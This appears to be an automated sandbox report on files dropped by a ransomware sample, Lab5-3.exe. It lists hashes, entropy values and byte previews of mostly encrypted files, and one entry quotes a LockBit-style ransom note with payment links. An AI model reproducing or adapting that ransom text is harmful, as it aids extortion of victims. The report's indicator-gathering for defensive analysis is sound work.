                                                                                                          Preview:+.V$....|^".*w3U!G..&...>v..nIefr].T\`..WD..a.".H..y.. ..<W...Am(9..2r..3..E.&..1d_..w.s*bR@...q".z.f.Z>.j..&......8Rz.7.......T...,....eI.u.{|......^f[i.iU......U.f.6gaI..:.b$..<Ml...p...?+[)..|...],......7.X,.......N?Lo._..%.3.>....Py.{Am...p.........~H.m.kR.W5..9I.... Y.)v......4.....B[.<.A%..-$.J&A/n2|$.:..Y9gM._Q..o.+.......D.i.....I......#..)...q|kN.....C....h.d.Ok.....j.v`.......3.C.Go.9.[`n...<.^A.-..o..U";.(7%..%..l...$.zl'<..m.....w.....<.......h..........6BWm=J........YBu.a.......`.rGu...C.,f..2^q.3....|@..k...Rlq...ou....Y.9....C...b...m.......Q[..........J.X....ki7.8.Uc... .......3....A............B.z..@5....&M.Ya.>.W.`./y7D.gZ..f.PS.........9...!..-*..._}...BW.!.4...>..V.. +..k.})...X-..yZ7.w,V..$..I..G....}...I......JU..%..r.;..mr.z/X&.d.h!.!...x&.dM_.-.z..\+....k.(.p.....E]....#....k..w^%.Y...1..PU].u...].`J>.N......l(J..c...........!.....?..g.m$._-..".1#..-.....l.lg...QO..).2r..D....*.......+.Y.........Q.ss..q....nQ....&v']..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.939559704648254
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0vmcG9OD+It/vNhFQghTp2bSWzAHfUTid3hBaUoSGFcmeykEdEElU92i:0nGmPt/FhTqDzGx0uKeY2ElUJ
                                                                                                          MD5:CA66B0C061666CF4ECEBB6407085DE68
                                                                                                          SHA1:065A09AB10948E9EA41EB164ABF4188E1662BA88
                                                                                                          SHA-256:B891CE49F84BA86AA52E3F6F106F42725DB45C300A05A19270A29E6329989CA3
                                                                                                          SHA-512:95ECDD2E0160A3EE23E4B6F1DD65D7D521340AC1394378D803DC1F3B3A0E71C3F0DFE981E5C160E5267182E9BFD35AB94B36D13E2EA218E2658C4F989CACBCAC
                                                                                                          Malicious:false
                                                                                                          Preview:S...E}.E.i..mC...L..J.R...d.+.K..&%....U..-.l.J.N..YZ..b.s(.&.......-\.(1.`nw.......+.S'.N...NC.%..N........5?,e&Z1..2...I.+]..!hc..........&....\[.R%..W..'.C(..~.X.Y.?2F.KW....#....,5!....M.&S..<.../.(C.....f.z.c..2......m..~'.....T..m....q.*.b..#.9..n..^O.O...N...y....*gO.s..1..$...b..G.m..?.3.8.D0..3Sy.D!...'j...:.,f.Hfm.=C..>:.O...L........Q.S...M.p....*..lr.....#.%~..[.t.O.Y.8.Nh......;.E.Sw(.OLu.. ->!....|.1..y....+...O.G..M..%....E..{.;..f.^M...E(..."`..^..U3y^?..^...5.[.=.z...)"@.......OM.... .E......"...]..?..).K8...xU.E.7.5..8.cKg.R...dh.>..7...aI.y.w.!..l..1.U.%nbD.I...B..P...qL\6...Y..B!.hx..@..-s...:u...*EO..[.<....lOIh`...(w9..ED...=...8g=......'J..Y.f.7...@./..V.U7..&}. .,.E...0.?)fq7......+|..$#H.>.G......Q..~.-W...J......M....C..h=.....07]...u#=...+3..........'.y..^.....p5.........#Ly...m...&T=....v..................v..,..*.[..V;...ie...z|hS..\....&.........I....t.pS.:..r2..(!+..:i.....b.%"..]R.!....3F.s]~..I.XI.C..<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.950307187174062
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:5D3lw3b352tKjLnkFmzpBGx0uKeY2ElUJ:5D18j520jL2mM0Cb
                                                                                                          MD5:E0AF583A874CB20DEB6000107CBB3047
                                                                                                          SHA1:C69094100AC0EDFD971B7ACF2DCB9A834BC32ADB
                                                                                                          SHA-256:DB7B4F28DC999B12A3DD67288CE0FB220C95FC9F3A2CE94BE18F5C58AF98F9B0
                                                                                                          SHA-512:BAADE6D5A5BD75F729CDA3B6BA86306CA6BB4865DAA9A9354AF6802C0A07C7BCD845C95981CCA9827384B29E94CC76C07A1A33F150F3F87720ECCE1B97BE53DC
                                                                                                          Malicious:false
                                                                                                          Preview:.......}.Y+..j.B.....B...i...R.y....>.d.O....=..`......=..\yt.%4..<~e...sy....+=.F..(o.-*.........1.x.i!/..b.Z}L..D......AZ.eE..'))..v._.J/..=s...ql.mJ.yj..rmzTP....<......{{.\4......Ft.`.-F..=..P.~..TiP.E....dZ.<B.a;U.5.j..b.+.d..T#............m=p..X.%.d).+.v.R[kR........a.V`X..8.......C........Kk6.......c......M...ML.42...Y `....b@......Q.....s.8k.+..z.+.).G>.b..X....Y_}JO...O.....$.a.[i<.`z...@.u.@...AH.E..^.....P..v..(.[.zJ...l...kX.\.gd{..H.k..W...m.J...i..d.?j.*.Xo...+........L..F5Uf......Q....'...%..^.i......P..1%HQ.M....WX.3.8..........;..~.V..-=.X{....!].~'.cBk.....A.4...$.k.38..."..2.!].A.w2.....N..A.]p.H..Z.^..s.q_.ac-?.i..<.r+........wvu...x.~........DE..z".!.`.y..O.#>A.g./_8....G;..Y;A..I..,5.)....*.E...?(...@A.U.C~.."/...m?_...._....r2N.Di.m{......O..j....)..p....+Ni...+...Y~...5..l..F..MM/.].r.'.....K\....QO..=.. ...p.&.]._~........R..Li.......>..q....(...]#.....'.1.m.\.#.....KP.HT....U....i....P../......e..Ch.E..i
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.931725424004028
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DXNus99E26iLzy6zjqUtz0LYCKHfUTid3hBaUoSGFcmeykEdEElU92i:jYspS6zjqbLFGx0uKeY2ElUJ
                                                                                                          MD5:5655BBA43C508868A31DF64A894F61F4
                                                                                                          SHA1:E0329ACC65205856AE911F46D62547C3E565E449
                                                                                                          SHA-256:AAE255CDA474E0398B5DC4C1F5A340D6B42B73599B19A3C11F4CC3F58651BD59
                                                                                                          SHA-512:110B77388EE27EAF99A7AE2C3EC5A734ADF38369A5E02FAB2FC9BDCDFFCE1FD58495257D35A1E69DBFD4126261842609CEB825434597DEE9629266BB6165039E
                                                                                                          Malicious:false
                                                                                                          Preview:..\....Oz.cd...}e.....r....Q(H.0...l....v|.l......@<......$..c.D.a?K.....i...v^.^....`'.~V1.Q...Q..[...&d.....y7.yv.L......3..^.7..s...KX.1?!...A.h.rO...M..rjY...]y..*k.........X.x...K...J.*y.&..;.E.,..D..+.Q.)>.....O....;h..w.j...@`Q....b.w.&.,.@...2.j.....%...z..G....xF......Hq..:..FF..HC...K..ra.+*.......0....R.T.r|.....4x.....y.9.....O..........B{..D.OS@..s....?.R.....\H..H.h..'.......-.C==./..M{8|.f..F.<.o..~E.p.}...o"/...n....b..{...j.}.Nt6'.....%...;v.?h......|b.ph.......Q.h.f..N.......M..E..j.SO...t..tx8..l..o..Z....Tn1fg..M.fKH...`....7..$Azq..1.6..2h.y..[....G.~J@..].To`.{Oq....4..|.d...xZ....]E....y#.f*.j[....a.....[|P...E.,a...../...N5n...{._b.E.).3G.......A.{.D8.`2..{......i.:@.%C...%.....M...&.-..rYh,.I...1...];vYF.d.C....2....D=.........._....=..T..3...x.X...:..6.Y..iH...H..Ig.?..u.t0..o.$\G.q..u).2..J..S..;akD.^<.....z.U.p...w.t..m7....G.........a:..=`.F..+)Wuj..QKX.-....oJt...|...M.g...5(....}.`6z.n.X> ...>.x...c.[L..[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.943421999271777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:x+zglc+jxem8uKR2UZOMCe2rzEahjnocLmP5mkai33HfUTid3hBaUoSGFcmeykEO:Qp64RZf0fhmnxmkai3cGx0uKeY2ElUJ
                                                                                                          MD5:934FA0F810E0E08AEB80DCC2C58CD5CE
                                                                                                          SHA1:716C938E5E5DE506EDB10840D5964D820D3FE966
                                                                                                          SHA-256:910C543F65C1CA0E88409AE2EE5D92F0C32902B902CA3DFAC4BD2D316633DEEE
                                                                                                          SHA-512:5BA88B0D7DA2DF1CA1714843DC6B71C50BF229C6E71DEA1D6AAECB15AE6C0D4C15A32CF3E89A1D92DF77F20E43C9628392A79395E469C4B0ADC0F0263FE1804C
                                                                                                          Malicious:false
                                                                                                          Preview:...[@4..:.].....Pw...9.".....v.S..UL..j5....;.Q...a]t.1!...5.Si..........y.i..{n8=.,..Y..*......8'.@R....`..#..Jd....B.,.2.......wE.:..h.]N/.K'H.`..M@eP..b.".D..`.9...."...B......L.R......&l-49...`+.......u.?..82=..s8.:..7.P.|.D.......*..u....;WJ'.d.../=Ai..^]:4.m..x..Je%....T....\.[%M.U2.......C.Bs.....F.l'(VU.NF.~@&;.w...m.....f.+Y..Av.|.b.%.............#4.9...cW6..7W|1.$k..a.-....-.c"..*.j..P+f.eaR.8..6<3..p...1.........!..8..*I.".^ukz@....n.<.%P.3..o.@Km...AR.n..V..\.Q..T..#..#v.D...~B.l.9.];[P.w8.u......%..ZF.$.v%.E..:.B..[....b....R....@..h..]V^rH.\.C.nf..Dp..i.....h.@R..^X.+1....|,P..(3....w....T..g'..;4.*..3&#..W...&UG.R..8.eb....x.........@Io<.-X.B.._.DZ...~.P..}/..#..N.......$y.;.].......|...$...u.%.DB..i.}.#....{..l.9.....xY....._.x...m...?.7....@2.@...?]. =.+;.....+..#..1s..v`..qq.?.%".l6..6)...[.......~^.O%....^R..2g.H....^.y...C.u....P.C.}.F..^B..60q..B.w[|.?"......[...@..B.B..jE[...%S?.....).j..*s...%~............v..r...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.929727764079406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:02d/4iBWoQiEempeJ1+pANlfhA7V1GGqP5/HfUTid3hBaUoSGFcmeykEdEElU92i:02l4iBzzEjperdG105EGx0uKeY2ElUJ
                                                                                                          MD5:A890E13F6AA3656D99DF62BD7D1377B8
                                                                                                          SHA1:FA83C6A9E612B144EEE59D89134971EDF5CCC7D6
                                                                                                          SHA-256:4C8F8BE0789C6125DB0E149EE76C46BC1BA74048C53F7B3B14921DABBFB02285
                                                                                                          SHA-512:017B37BE14EB6CAD66603E90770C9914045671144F787EC8B195261BB032B383A7E9D006D3F0A859B60092FADCBBC4659FE4E6081313CB48CC44307C2DB13BD4
                                                                                                          Malicious:false
                                                                                                          Preview:....=..gl....&.pzV.....#...)...K..L...a...@w.......;....[.....|x...(.J.v[a...5..,.}....h..V.m...&...+[.;.+..?.xf.~.\..^;2#<..,.>.q.......C$...,.....p......DC.$clD....:.\.=..?..*Hn..#>.8i..LW...C.M..R.g.3..i...i.b.jP...I8.;....f.....2e.H..]..;/.1.........%........T.L..&..z..Xc..Lx....>@......+.#OS..[.qy....x ..KM.. ......2H.2.."7.J.0-..........d....7l..k..2x.......8K.J....X..RT.....t5...W_.Q[..................|.f..{..h....:$45...........t.........F9.z.).o......?..IJ..=L..8.........v..gj'.x..3.GL...Z|.x.8V2Q.,..n.......'l....k...l..H.P ......v.p.x..2.....l.Y.e.$...i.*.c..1........./7.....>...'..r.|..:q....H....\...<n..p$..2..z._.unx=/...Ff...."...A....0 .\..l%O.i..t.|.e..Q...7......V......L...(>3=F.6..)...D.2x.{PD.N....e...v.|..Fu6...Fd.*...Z.........f*.s.M..h..$.J..`.wz..8.C.pv....S...@D.L^.M..8[....PZ..!...8.....P.....}...~.n..3..w3$(...9(..[.%*..J.-y.u..i..<.."./<],.4.vgB..6q].X\9.o.....C....r!.:.w0..z6.#@x.W..Y.o......"...!n.-.k.C.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9488
                                                                                                          Entropy (8bit):7.979284136436777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GjUPHFpiqlqi+88HvQV0cwidHCz6k4CLqBVp9yMRJtKyzoaNGkl3FPAuJNf60Cb:GjUPHFpiyqisHvQVNwidWd4JBVLKFAGl
                                                                                                          MD5:78DF25C98AF34D3747DEC86A157889CD
                                                                                                          SHA1:348CE1E811A631F1E81C410D02760014C3522F4D
                                                                                                          SHA-256:88FA86A90925B8E972DF558DE0D76F032052B121BE137B8A99E9E2BF586B8963
                                                                                                          SHA-512:7F54C771BB6D9290A231F768D7F5AF28C7E4E325522B41E2DE661729BFE2DB4193B9948290554C55148831134713E275366018BCCC2BC62D22C14F35F50F19C5
                                                                                                          Malicious:false
                                                                                                          Preview:|}.5vs9....V..g0.......R.Rh&<.C;.Q..m..."..."~..@+.i.r.Iz@A...u....Q=9..;..C..1..w.N..j../.}. m.m..o.I.]t.Z&.6...s....."m.H.2.0u..W.k....Bz......PuV..@.,.f.8...Y.!.....v...y%/>..(.:Y.._G......*i...*...j......dd. ..>l._..0........,>CD..._#..G..w%v..a......]?.4....6Vo`{a.5.'..ih"_...*=.....m&.o..P.%.&A.@.&...S.......i.L..*.p.....T.Iq...4....?.....{..S'YM.;..k!)...u.y.1...!k.S.U.4..T...z.d..P..->J(...x"lc..UA&/.I.gg..5.K.*?...T...0#...~..u..e.2.-.....dz...d...:4.KJ*..A..y..]Xm....n...x=...zs..%secUoR.DH..b.u...AX..rE...?.[.^I..~?.S3....l.ii.hQ].:fw.oD.P/......B.. .n.|"Q..?...W.x......RF.&}W.{_...)./...;.wu.g.-g...+~.N.%..i..9.x/......,W.e..LxR.~.8...H.G>.1.5....D.}`.7V61....#.3.(G..fp.Q....NV.P....nd...U].d.].....[.08......%1.Z...|,..Y.$..3bb...oGLZ...rY..Z3.8-...~.*.7Z.t>.y......?......g..h..H....o..$..`..-.....2...(Yag.@.&:.8..Z...+....3.(.e"#.x~.#....//.x.L....nJ.ta.......u=[/..vV...4x...:.q.gP....U......'......Nh..,..X...M.L.~V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12672
                                                                                                          Entropy (8bit):7.9855862362911365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:07G6l6qwrHYvqEdi0lPw1kXaoY1/tEBtb:IHRkEQ0Rw1OaoYt6Z
                                                                                                          MD5:8EBFD80BE7089075A387ED094610925C
                                                                                                          SHA1:FEDCC3A555D0F6BEF1F6544E55D38CC398C14819
                                                                                                          SHA-256:03FD87B265901C06B5995AE937D35C4C15C753E6398B21B677DDD9CDE2C3D405
                                                                                                          SHA-512:5E38136BF3FD3BF9BA2CEF363A02F3371FBEA3A8A59E245D9842604F64B91D267C90EE7649D418502AF88C26478EA62F90A69ED34291B20BE87B89EDE17B2162
                                                                                                          Malicious:false
                                                                                                          Preview: .g.7..6.P...c4(M./r.$....8...f..\...#..h.TP.d.o+.V.....TJ....M... ..E..k....u......8z....g%fG...1#V ...1...g.7W\ox.B...O.x...fI......r]..~.;.r...YN..qra...;y,..O\>N.......#..ad.g..:-.........x..M2.{.c...].`...HDI.L...,.%3z$..R...p... W..|b<...b =..5AO..A:.s./s.(.c0]....,.........Il...;.R..d.........".;..W.....!...(..a.7..szH.,..l......._.{n.%..3....`.0.?.Y......,..i.X.6h.....l...o.c..X.N.........F.E.kj.b....|.{...q8g.....A.r.i..uV\/T..../5.[w3f........E;...{:4`U..........F........9.d..dIN1...+x..u.*..*._]?O.....6/d.T\q..0$..U..k.K........k..r..'..".`.$J.#*.9..`1.......|.../?.....yL....|c31....{v.cWp...t &.H.C..8JB.~.v...1H...q...K.J..$.}.N.l.#..X/.$...g... ..O..otxI.s..\...H....7..$......g...'F-?..Z.d.{38...U2...6i..e...#.y.c?.v.0z....%.z..v......wK..np,....R.4... .=....[.h%....>..'J.|..x~...3.I^W6.q].lc.+.,......=N.e<N...g.H..CB..i..maQ!<8}.&2RS.H7.y..V2.._.[.S..!...........g...^..z....v.z...l.?64h.]m.5.z6..k..D...%....%...{.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66480
                                                                                                          Entropy (8bit):7.9970373070297684
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bHF6CvbiELVa2YBkkxzdfcmS0VWeWGZqEcRiPSsqWkqrcvcwwja4OsVmgoIULKaQ:54aa2Y/hgK0ySgrosVmh2VastQ7G+ZUZ
                                                                                                          MD5:37038E1A271E8C134CD84F8369A7AA0B
                                                                                                          SHA1:06C2000437181F9C8442CACA25397B2737CD9098
                                                                                                          SHA-256:C1B5E42D3704397AB2B1D0135C707F30D145F53182385320F4F2272E6A0662CF
                                                                                                          SHA-512:263B2B666666BA213726B776E0FBEA9C99D094C3C1C32A37A8D70A96DDA276390F0111F024BBC3D73496A6816DCCB44CFE1895F6741792CD39A9A84C5DE16D04
                                                                                                          Malicious:true
                                                                                                          Preview:..u..82+..N..1-.u..P./F...M|s.."..$......'..R(..#.LwU...PT..VS-DKI..zY..t.Ti...E5V`...P...H7..<..BPh.".........-.No.&.......X.R...0?...1.....x(.z.h.2.jW...S..D..H...w.-#`*47.....Y....".C./...UH..oq.e..ZI,....`..h8..[I...Z..S#.z....2..>.*..l.W!s..6`... Qg...r...'...Y{3.H...U..DO^..-2G%.V=..Z..0....{3....W9....o+..>.?.....A.&.O.g.d.\[P.R....#...%:.t..?v3R.sQB..y....."....K....d.......Q.F..t_..y..{.W.H.".r..e.yT ....Jj.R.aZ.g....+......6.......{Btc....F...n....L.....!f.H.$..4L..E.4.H9.`N.0m...CT.......(..><3`.."a..o..`\.$.IG*H...}.....U.;.1.h.R.0..w...X>......'JRG-....y....?....!.O.*.p.l.M.....=..a.....].\..f.....p.Y-.....9......cb..A.Dy...,.}.@~R7.#...7....d...V.![../...aPl...G2..ya..^2..j.K..T.K....-<..9._.#..........|...#....w.k.m.3........B.q4..Z_.p%....+AU.q...w..;..Ek..o....:...t...{..G_!.).......R.clR:S.<Y.}..>.ao./Y}z,..<.>..v.b...x..K8.{.>_.Z`.S..u.jr..PZ.8.xuy.b~.*.....+..u..M!Sy..N.t...@J..zl...`.x..q.....M..g.K..J.[...s.GF...X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66480
                                                                                                          Entropy (8bit):7.9976203503009335
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:OBouvGnRYQqfPw76m1Eeu7iILuzJ0nJQYOqJXf7g4Niif78XblsRpXOCQ8pfmZ:URuRYQVru7hYLYXh7g4zaQp+wpfmZ
                                                                                                          MD5:3618E0064CF0193CBEC43A23D8BD2E26
                                                                                                          SHA1:AF788DF4D3F80BFA3B5C40BD3C40E80BED0F24E8
                                                                                                          SHA-256:F287BEE07237ABD49002A7802F2EF8727EC41A0F9AC864CB98BEEDDA0A9204A6
                                                                                                          SHA-512:2E6E48F7DBB207F4446C3F747846C140B2FD69B30F0B9CE30FFA2C4002BBE4767A52972CD5263E6104497A04A8F058AF81E344D84CE86E2E636E9474491676FE
                                                                                                          Malicious:true
                                                                                                          Preview:7.).H.e..d...~......$..S.\..I.L..........N.,.j..M.,T!:t...b.........+.#..I8A5..Pl.n..jM#.^...C.8..+......$0...RXf'.4e..|g3.x..@i1..O]..F.....<.. .c..5.....:....d$,._...........Bl.....n.LIU2....s*.....xX....53...4.v......M<........OE.q5Y.>...@i..N..?.2O....`.X....;......k.*..4e"CCS,.^..vX.Y.o...ep...^~\.2...[.`Rt.5Q#2x....+..,....D..S..h..i...s.c..g..fz..K..j...c9.dF.....b..p..o....... .7.fw.s%<.=T..?.)..E0.a..o....."6..........!.HN.p`....|..XF..x._...Yc....(..........3\....y.|#..s..:Wo_AiA..o...t..[..1..*..*...|.-4o'...Jw3O.\..lk2^...D...*...g..0#.}.D...?.r.Z.^.^.C....h.|...[h_....A..tD..m?.;].G...@.vB...$R.4d..Hx.r..o.4."4.-....n.N.o.(.Yy{.z.T..vSY.k..* .....E...g;~ES.-iy[+......w...E+_E.?SX.7.....w[..p.O..=.].F}......zD.=9H..vK.cu......Y.v'k..Zc'....o`n.2%....{.?.:..Q.... L.P_....`..2...S&.!...m.m<..iw..1...2U .Mr.^4.B..\..n.L..4.}7Ru.)._v...-.T....9.......c[..s3.V;...\...k0..SI.C..,...@L#~V...;.i...HCM.....H..e.!M0......:<..x~...a7y]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53376
                                                                                                          Entropy (8bit):7.996810037910888
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:m/LEP7u+D9hB2jjwmjAoDSNv8OMke+npYD1b16Z:qAP7rD9j8jAoD+8O1e+npYDtgZ
                                                                                                          MD5:B6EDBD4C0DBF9F78B9845B237FD3B012
                                                                                                          SHA1:758C0C503C22F342645B49414CBC420789C3883F
                                                                                                          SHA-256:B5252086F07ACA8BFF319DA8DDEAE09716EB6347A71947CE71E41148579B79D7
                                                                                                          SHA-512:3F5E5ED316907D5922EBE2BAD119D20E31799A623CDA2C8776AB9864DFB3892D060DEEA357167E88D361FFCDC8810482CBF100B50D2241B0D29159EA4BB0648A
                                                                                                          Malicious:true
                                                                                                          Preview:..,.....jYDWM..N+....;.h...qT.D..u.%..Q.....f..d..S.(._.........Y....!0==p...8....l.D.....=m.Kbd..R[Nc:...GH..|.T.S6.C...,+...hl....GK...:.Q..\.O.I..&r#.....G.G.....+".....#...."+......Q..L......[g3}I..R..e-.a..9.....fD.E.6..`.........`.@.......rI...E/F..J{@ph...#..E.....p.@.Z.-g?...pHF..&.4....R...U(d...&^.P......nk.............(.u..as.l..SB.z.I;.55..|.....=.....0.,....p.: .6._S..@-n..Ly.M...u!B.$q.:h..Y..1y.).(`]7".m..e.i....B.`..p.....@+...._...c......Ad.....*.g..0..%*'5...a(.-...>3...l.ny..j*d%eY.-.....q.p.O......g....@....'...w...}.'..DhhI... N.E...#.........+..;|`.#..y..f>..]..DQ..9.t<..Pj..r......yM...N6..?c.O.O...q.,.}..g..Q.......Fz..,.0..7...w...4&.Ua.~..%.3...`.G..g.y..*)m...n......$...........zM..uq.\...w[G.&.......R}.y...i...=.mH;U.d.......f%>Z-.....IEK@*Q....1;..<..HQ<..../|.N>.=.P+..M..2.D..B..)b....1.Tn.>.`.._..G)....<....BR.....d....#...Z......y...q.._.0.....]y....C...4%.rg33t-.....P...%..C...Z..(8H{O.x...z...LO...m...|g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.924210117462548
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TP4F9aEUu25gOff8rXQVAVHfUTid3hBaUoSGFcmeykEdEElU92i:TP43aEUuhWf8r6ZGx0uKeY2ElUJ
                                                                                                          MD5:D1269E83F333417859FAE12ECF1A4588
                                                                                                          SHA1:DF6DA6C2E34D9CF769B77EFCE70AB54A06262D26
                                                                                                          SHA-256:39C80F146F0AAC4991579F8052B9E53D5603B871C22178E26780063AA8D8704A
                                                                                                          SHA-512:13A2C4B38B893272DBD9AF986DF17F115E45AEF0316643FB94C0AB202FEE495B865770ECC2208669045F3DF8FB527F80EC82B3CFCA1DC5AB91D6EDA264A869B5
                                                                                                          Malicious:false
                                                                                                          Preview:.?k.tR....]...!..i.A.B.`.7....^Ea.\..4.5~:n._..%..cD...l.......#..f|...l.\G.7I...[.t*...&....,x.$.s(..4.Z...Y.......R.jB>.](..|.....p.7..p...FBc....1O..Wx.6F.6...4nCzy.h.W./.R.d..;l4.s#.... .U&..@f!.fA...0..B1..mNu.t.d..s.E.Q.c...k........:.:~K...U.XI=..f.?./..r....i....Gqh.mU...)....s..6..v&..L[..>r..5.N...e..=..z...hL....g.PW....%....[....=c.H..-.......v...x..|.;xp......|C.TJn.q........q.....H..*.5....,O...U...p....6.F@.}...C{\.........IX...x....c.ybJ..W..e.BR....%.b8.Yz.. ..wk.i.N..^..lA....P]..R.=.P..D.-..Y8jy.4....p...P.a".5....aBJ. ......&..n....U...4....g5....!..~...<Q.".S ...2..5...Y....<......p..f...A.E!.J..].l.............^.......[.O...=.gGgNm.5=...)..VOX..`..?.y..h..r...#}.4.5..UY.Hf.P7.....z....../{U..7b....O....r.......W.....K..3...m.vT.<T..P ..l.....o..s;...r..ZY...Y.<)q..u._.]....g.Im.1\r,...@I......W...u...{.s....k..:..N.}<...d.{.Q..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.942424907779189
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Bjfv6JmYJHD2L2rqJIx5NGx0uKeY2ElUJ:4JTHSL2lu0Cb
                                                                                                          MD5:836C41DBF4AE149F5CC40A5835A561A6
                                                                                                          SHA1:C3552B600F5DBFD9F93CFF4EEFE3A6C37AD19856
                                                                                                          SHA-256:37C81FD2FC58EBF9DAD807F3A6BA43EBD26A43B8B2EF9090A6A250A5842B3FD6
                                                                                                          SHA-512:19528D107C6B229781386A20EB824F96FA83554BB869A7F37C7D5D4386BA702176283C1FF07E339138EED04B85EFAA864794E14C76C4042D2DB2E809DD59C014
                                                                                                          Malicious:false
                                                                                                          Preview:4.....P~....i..Z..M].....o%....AdV.3..^1.....;.5v.B.4'_d.'..D..'r......U.6....O..aU3HkQa...O.;...@...F.....wl9.1^k.!.MO$4..Xx........k.W.x.Y...X.l..d.U........'$...X{@v0.._/..z.)..kl.....\&.H*.h....x.m}....A..).....ru{.9....].&.R.f.6...[....A..i.7F3..IZ.gG..m......D.fI.H..(..........cS5..).....".u.~.....hY#HI...8S8r...n.....I.2.d=.M.$ks........G.i~;...i..1....s6......+ME.V.....[O..!.u.....@7/...$.h..]......@........6.U6..%.!.....{....f....9.=r.H...RbT?.~..............b<..~..L....:..j(..IU.^f...(.....K....\..c........\q....2#.m.yH..z(.....!M....).Te.R.!.F.....K...... ~.-.}.z..a(.....M.c.. +&F.....K.......J.>y.Kr..Q.....*....[.3DDm.}....P...`e.(i..I.TB....NW..Y.....'^M....v'.F. .KQ.c......w/l..T.R..m.O.......l7F&...`R...o....`...lF.^.PU..{r.....B..EV..N...=......H.H.Zc...]J....Z..".9(}.....:?..]....(.. C.F.]9.?..;j......{4.+....f.[...a0-.@.f..Jr5X+....."F..[.3XrC....7....V...s.T:B...9Gn...^...0p...TE...Q.0.z.....H.B..8uqQ.=...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3344
                                                                                                          Entropy (8bit):7.943579025608117
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Z330a+y+c4mfN8DE9DRt1aGx0uKeY2ElUJ:Z3k+X4XDEZRjJ0Cb
                                                                                                          MD5:3F29FA615C7E61AE600A137393F224AD
                                                                                                          SHA1:1805ABEA2CEE17894F354F799CF6901373ED2F80
                                                                                                          SHA-256:EB41BD4D19BF1B9BD1EF3F44C32BE8124ACAC429570F70D952AA34FF65096094
